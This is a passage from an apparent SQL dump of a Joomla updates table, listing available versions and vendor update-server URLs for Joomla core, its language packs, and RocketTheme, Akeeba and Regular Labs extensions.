Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(13960,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(13961,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(13962,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(13963,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(13964,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(13965,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(13966,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(13967,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(13968,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(13969,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(13970,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(13971,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(13972,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(13973,3,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(13974,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(13975,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(13976,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(13977,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(13978,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(13979,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(13980,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(13981,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(13982,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(13983,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(13984,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(13985,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(13986,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(13987,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(13988,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(13989,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(13990,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(13991,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(13992,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(13993,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(13994,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(13995,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(13996,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(13997,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13998,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.27','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(13999,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(14000,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(14001,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(14002,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(14003,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(14004,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(14005,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(14006,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(14007,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(14008,57,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(14009,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(14010,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(14011,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(14012,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(14013,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(14014,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(14015,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(14016,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(14017,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(14018,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(14019,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(14020,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(14021,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(14022,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(14023,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(14024,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(14025,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(14026,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(14027,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(14028,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(14029,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(14030,57,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(14031,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(14032,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(14033,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(14034,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(14035,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(14036,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(14037,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(14038,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(14039,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(14040,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(14041,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(14042,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(14043,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(14044,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(14045,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(14046,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(14047,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(14048,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(14049,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(14050,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(14051,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(14052,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(14053,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(14054,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14055,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(14056,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(14057,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-2.html\n				',''),(14058,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14059,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14060,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14061,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14062,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14063,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14064,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14065,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14066,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14067,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14068,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14069,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14070,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14071,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14072,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14073,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14074,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14075,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14076,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14077,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14078,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14079,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14080,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14081,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14082,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14083,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14084,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(14085,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(14086,3,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(14087,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(14088,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(14089,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(14090,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(14091,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(14092,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(14093,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(14094,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(14095,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(14096,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(14097,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(14098,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(14099,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(14100,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(14101,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(14102,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(14103,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(14104,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(14105,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(14106,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(14107,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(14108,3,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(14109,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(14110,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(14111,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(14112,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(14113,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(14114,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(14115,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(14116,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(14117,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(14118,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(14119,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(14120,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(14121,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(14122,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(14123,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(14124,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(14125,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(14126,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(14127,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(14128,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(14129,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(14130,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(14131,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(14132,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14133,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.27','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(14134,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(14135,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(14136,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(14137,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(14138,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(14139,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(14140,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(14141,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(14142,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(14143,57,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(14144,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(14145,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(14146,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(14147,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(14148,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(14149,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(14150,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(14151,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(14152,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(14153,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(14154,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(14155,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(14156,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(14157,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(14158,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(14159,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(14160,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(14161,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(14162,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(14163,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(14164,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(14165,57,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(14166,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(14167,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(14168,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(14169,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(14170,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(14171,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(14172,57,0,'Serbian 